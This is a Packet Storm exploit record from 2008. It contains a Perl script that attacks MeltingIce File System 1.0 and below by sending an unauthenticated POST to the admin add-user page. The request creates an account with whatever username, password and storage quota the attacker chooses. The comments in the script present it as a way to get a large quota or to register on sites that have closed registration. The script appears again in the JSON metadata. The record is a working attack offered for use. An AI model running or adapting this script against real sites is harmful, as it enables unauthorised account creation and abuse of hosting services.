ID PACKETSTORM:66501 Type packetstorm Reporter t0pp8uzz Modified 2008-05-19T00:00:00
Description
`#!/usr/bin/perl
use strict;
use LWP::UserAgent;
# NOTE: user a pretty uniqe username, has the script will say successfull if a username aready existed!
# NOTE: exploit is mainly to get a nice quota, but it can also to be used to add a user primeraly because alot of these sites doesnt allow registration.
# Script Download: http://downloads.sourceforge.net/meltingicefs
print "[*] --- [ MeltingIce File System <= 1.0 Remote Arbitrary Add-User ] --- [*]\n";
print "[*] ---Discovered && Coded By: t0pP8uZz / Discovered On: 17 MAY 2008--- [*]\n";
print "[*] --- MeltingIce is a file hosting script, this exploit will add --- [*]\n";
print "[*] --- a user via the admin panel, and give it a specified quota. --- [*]\n";
print "[*] --- [ MeltingIce File System <= 1.0 Remote Arbitrary Add-User ] --- [*]\n";
print "\nEnter URL(http://site.com/): ";
chomp(my $url=<STDIN>);
print "\nUsername(create's your username): ";
chomp(my $usr=<STDIN>);
print "\nPassword(create's your password): ";
chomp(my $pwd=<STDIN>);
print "\nEnter Quota(quota(mb) of space you want, ie:9999): ";
chomp(my $qta=<STDIN>);
my $ua = LWP::UserAgent->new( agent => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" );
my $ob = $ua->post($url."/admin/adduser.php", { "newusername" => $usr, "newpassword" => $pwd, "newquota" => $qta } );
#is_success was acting strangely, so i had to do without.
print "Completed! Try logging in ".$url."\n";
exit;
`
{"reporter": "t0pp8uzz", "enchantments": {"score": {"vector": "NONE", "value": 6.8}, "dependencies": {"references": [], "modified": "2016-11-03T10:27:32"}, "vulnersScore": 6.8}, "published": "2008-05-19T00:00:00", "cvelist": [], "lastseen": "2016-11-03T10:27:32", "history": [], "id": "PACKETSTORM:66501", "sourceHref": "https://packetstormsecurity.com/files/download/66501/meltingice-user.txt", "objectVersion": "1.2", "sourceData": "`#!/usr/bin/perl \n \nuse strict; \nuse LWP::UserAgent; \n \n# NOTE: user a pretty uniqe username, has the script will say successfull if a username aready existed! \n# NOTE: exploit is mainly to get a nice quota, but it can also to be used to add a user primeraly because alot of these sites doesnt allow registration. \n# Script Download: http://downloads.sourceforge.net/meltingicefs \n \nprint \"[*] --- [ MeltingIce File System <= 1.0 Remote Arbitrary Add-User ] --- [*]\\n\"; \nprint \"[*] ---Discovered && Coded By: t0pP8uZz / Discovered On: 17 MAY 2008--- [*]\\n\"; \nprint \"[*] --- MeltingIce is a file hosting script, this exploit will add --- [*]\\n\"; \nprint \"[*] --- a user via the admin panel, and give it a specified quota. --- [*]\\n\"; \nprint \"[*] --- [ MeltingIce File System <= 1.0 Remote Arbitrary Add-User ] --- [*]\\n\"; \n \nprint \"\\nEnter URL(http://site.com/): \"; \nchomp(my $url=<STDIN>); \n \nprint \"\\nUsername(create's your username): \"; \nchomp(my $usr=<STDIN>); \n \nprint \"\\nPassword(create's your password): \"; \nchomp(my $pwd=<STDIN>); \n \nprint \"\\nEnter Quota(quota(mb) of space you want, ie:9999): \"; \nchomp(my $qta=<STDIN>); \n \nmy $ua = LWP::UserAgent->new( agent => \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\" ); \nmy $ob = $ua->post($url.\"/admin/adduser.php\", { \"newusername\" => $usr, \"newpassword\" => $pwd, \"newquota\" => $qta } ); \n \n#is_success was acting strangely, so i had to do without. \nprint \"Completed! Try logging in \".$url.\"\\n\"; \nexit; \n \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "description": "", "references": [], "edition": 1, "title": "meltingice-user.txt", "type": "packetstorm", "modified": "2008-05-19T00:00:00", "hash": "ecf4b628305456f1811dbe7a90cf81b8596efa16cd803d96121308ea509bb72e", "bulletinFamily": "exploit", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "9510b64c40aee702dc0b4e9ea58d63aa", "key": "href"}, {"hash": "7cd402b26224f460136eb8c348721928", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "7cd402b26224f460136eb8c348721928", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6ae4571c7d8e7d463247ccc5545c05d5", "key": "reporter"}, {"hash": "477c5b6b63d508e4968a0437cda31b3e", "key": "sourceData"}, {"hash": "fe09b199e193fe11a8671f23e4ab72a5", "key": "sourceHref"}, {"hash": "a61941aa5d60aa224e1adb7cd7fff606", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "href": "https://packetstormsecurity.com/files/66501/meltingice-user.txt.html", "viewCount": 0}
